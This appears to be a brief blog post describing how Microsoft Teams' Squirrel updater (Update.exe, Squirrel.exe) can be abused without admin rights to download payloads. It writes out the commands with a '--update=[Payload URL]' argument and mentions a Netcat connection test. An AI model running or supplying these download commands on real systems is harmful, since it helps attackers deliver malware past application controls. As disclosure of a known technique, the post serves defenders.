Downloading Payloads With Microsoft Teams

Image result for microsoft teams

It was recently found that Microsoft Teams had a vulnerability which allows malicious parties to download payloads. This is due to its under-lining auto-update mechanism called Squirrel. It’s not just Microsoft teams who just use this, GitHub, UIPath and WhatsApp also use Squirrel behind the scenes.

It was recently found though that the Squirel.exe and Microsoft Teams update.exe can be ran with defined arguments. This could be abused, and malicious parties could use it to download payloads.

You don’t have to be admin and can test the exploit by running the following:

Update.exe – -update=[Payload URL]

Squirel.exe – -update=[Payload URL]

The example below shows the client establishing a connection to me Netcat session. Just to prove it will connect.

Other arguments can be used such as – -download and – -updateRollback.

One thought on “Downloading Payloads With Microsoft Teams

Add yours

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: